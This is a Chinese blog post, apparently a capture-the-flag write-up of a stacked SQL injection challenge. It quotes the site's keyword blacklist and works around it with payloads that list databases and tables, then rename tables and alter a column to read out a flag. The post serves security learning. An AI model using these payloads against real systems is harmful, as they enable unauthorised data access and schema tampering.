1、打开显示f12是没有灵魂的
2、使用万能的sql注入语句 1' or 1=1#
回显不正常,说明存在注入
3、开始判断有多少列,当开始判断到第三列时,回显不正常,说明只有两列
4、现在就开始注入了
但是在用联合查询时并没有返回想要的信息,出现了一串
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
上网冲浪了解了一波,好像是类似黑名单,这些词会被替换,那没办法了,我们就用堆叠注入
PHP preg_replace() 正则替换,与Javascript 正则替换不同,PHP preg_replace() 默认就是替换所有符号匹配条件的元素。
复制代码 代码如下:
preg_replace (正则表达式, 替换成, 字符串, 最大替换次数【默认-1,无数次】, 替换次数)
- -1';show databases;#
- -1';use supersqli;show tables;#
-1';use supersqli;show columns from `1919810931114514`;#
这里数字要用反引号包裹
- 接下来应该select flag from `1919810931114514`,但是select被过滤了只要网上冲浪看看大佬们怎么做的
我们查询word列发现结构大致相同,由于注入框的查询是对列id
的搜索,此时参考两个表的列名,需要将flag
列名改为能够查找的id
列(修改包括名称和数据类型)。
接下来输入:1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#
- 在用1' or 1=1#就查出来了
借鉴一个大神的
第二个方法是将两个表列名互换,查询语句不变的情况下,会直接查询words表中内容。
RENAME TABLE tbl_name TO new_tbl_name 将表tbl_name的名字改成new_tbl_name。
由于注入框的查询是对列id的搜索,此时参考两个表的列名,需要将flag列名改为能够查找的id列(修改包括名称和数据类型)。
ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;
1
具体为什么修改为CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL就是数据库数据类型的问题了。
将操作连贯起来,构造Payload。
';RENAME TABLE `words` TO `word`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;SHOW columns FROM words;
1
到这里我们的表列名就已经修改完毕,此时还会输出修改完成的words列名,最后通过万能钥匙1' or '1'='1即可得到输出。
array(6) {
[0]=>
string(2) "id"
[1]=>
string(12) "varchar(100)"
[2]=>
string(2) "NO"
[3]=>
string(0) ""
[4]=>
NULL
[5]=>
string(0) ""
}————————————————
版权声明:本文为CSDN博主「ch3uhx9」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_45969062/article/details/114683113